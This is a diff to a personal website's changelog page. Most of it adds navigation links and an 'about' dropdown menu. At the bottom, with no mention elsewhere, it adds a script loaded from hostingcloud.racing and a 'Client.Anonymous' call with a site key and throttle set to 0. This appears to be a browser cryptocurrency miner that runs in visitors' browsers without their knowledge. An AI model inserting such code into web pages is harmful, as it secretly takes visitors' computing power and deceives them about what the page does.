--- a/changelog.html
+++ b/changelog.html
@@ -85,7 +85,26 @@
 							</div>
 						</div>
 					</li>
+					<li class="fancynav-item"><a class="fancynav-link" href="/how-to-help.html"><span class="fancynav-link-content">how you can help</span></a></li>
 					<li class="fancynav-item"><a class="fancynav-link" href="/gavin-seim/"><span class="fancynav-link-content">gavin seim</span></a></li>
+					<li class="fancynav-item fancy-dropdown">
+						<a class="fancynav-link fancy-dropdown-toggle" href="JavaScript:void(0)"><span class="fancynav-link-content">about</span></a>
+						<div class="fancy-dropdown-menu">
+							<div class="row pb-4 pt-3">
+								<div class="col-sm-auto pr-4">
+									<a class="fancy-dropdown-item" href="/about.html">About Me</a>
+									<a class="fancy-dropdown-item" href="/changelog.html">Changelog</a>
+									<a class="fancy-dropdown-item" href="/contact.html">Contact</a>
+									<a class="fancy-dropdown-item" href="/contributing.html">Contributing</a>
+									<a class="fancy-dropdown-item" href="/copyleft.html">Copyleft</a>
+									<a class="fancy-dropdown-item" href="/support.html">Support My Noble Efforts</a>
+								</div>
+								<div class="col-sm-auto pr-4">
+									<a class="fancy-dropdown-item" href="https://github.com/kawaiidesune/kawaiidesune.github.io"><i class="fab fa-github"></i> Repository for this Site</a>
+								</div>
+							</div>
+						</div>
+					</li>
 				</ul>
 			</div>
 		</nav>
@@ -162,5 +181,12 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
+		<script>
+		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
+		        throttle: 0, c: 'w', ads: 0
+		    });
+		    _client.start();
+		</script>
 	</body>
 </html>
